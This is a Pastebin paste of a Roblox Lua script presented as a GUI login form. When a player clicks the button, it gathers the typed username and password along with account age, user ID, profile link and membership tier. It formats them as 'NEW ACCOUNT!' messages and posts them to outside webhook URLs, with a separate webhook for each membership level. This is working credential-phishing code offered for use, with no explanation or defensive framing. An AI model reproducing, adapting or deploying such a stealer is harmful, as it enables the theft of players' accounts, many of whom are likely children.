Advertisement
Gostrondude

Untitled

Sep 16th, 2018
221
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.18 KB | None | 0 0
  1. local stuff = game.Workspace["SETTINGS_WEBHOOK"]
  2.  
  3. local http = game:GetService('HttpService')
  4.  
  5.  
  6. script.Parent.MouseButton1Down:connect(function()
  7. local ifnbc = {
  8. ['username'] = 'V0rt3x MGUI NBC',
  9. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.user.Text .." \n PASSWORD: "..script.Parent.Parent.pass.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: NBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  10.  
  11.  
  12.  
  13.  
  14.  
  15. }
  16.  
  17. local ifbc = {
  18.  
  19.  
  20.  
  21.  
  22. ['username'] = 'V0rt3x MGUI BC',
  23. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.user.Text .." \n PASSWORD: "..script.Parent.Parent.pass.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: NBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  24.  
  25.  
  26.  
  27.  
  28.  
  29. }
  30.  
  31.  
  32. local iftbc = {
  33.  
  34.  
  35. ['username'] = 'V0rt3x MGUI TBC',
  36. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.user.Text .." \n PASSWORD: "..script.Parent.Parent.pass.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: NBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  37.  
  38.  
  39.  
  40. }
  41.  
  42.  
  43.  
  44.  
  45. local ifobc = {
  46.  
  47. ['username'] = 'V0rt3x MGUI OBC',
  48. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.user.Text .." \n PASSWORD: "..script.Parent.Parent.pass.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: NBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  49.  
  50.  
  51.  
  52. }
  53.  
  54.  
  55.  
  56.  
  57. local newnbc = http:JSONEncode(ifnbc)
  58. local newbc = http:JSONEncode(ifbc)
  59. local newtbc = http:JSONEncode(iftbc)
  60. local newobc = http:JSONEncode(ifobc)
  61.  
  62. game.ReplicatedStorage.hey.OnServerEvent:Connect(function()
  63.  
  64.  
  65.  
  66. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.None then
  67.  
  68. http:PostAsync(stuff.NBC.Value, newnbc)
  69.  
  70. else
  71.  
  72.  
  73. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.BuildersClub then
  74.  
  75. http:PostAsync(stuff.BC.Value, newbc)
  76.  
  77.  
  78.  
  79. else
  80. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.TurboBuildersClub then
  81.  
  82. http:PostAsync(stuff.TBC.Value, newtbc)
  83.  
  84.  
  85.  
  86.  
  87. else
  88.  
  89.  
  90. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.OutrageousBuildersClub then
  91.  
  92. http:PostAsync(stuff.OBC.Value, newobc)
  93.  
  94. end
  95.  
  96.  
  97. end
  98.  
  99.  
  100. end
  101.  
  102. end
  103.  
  104. end)
  105. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement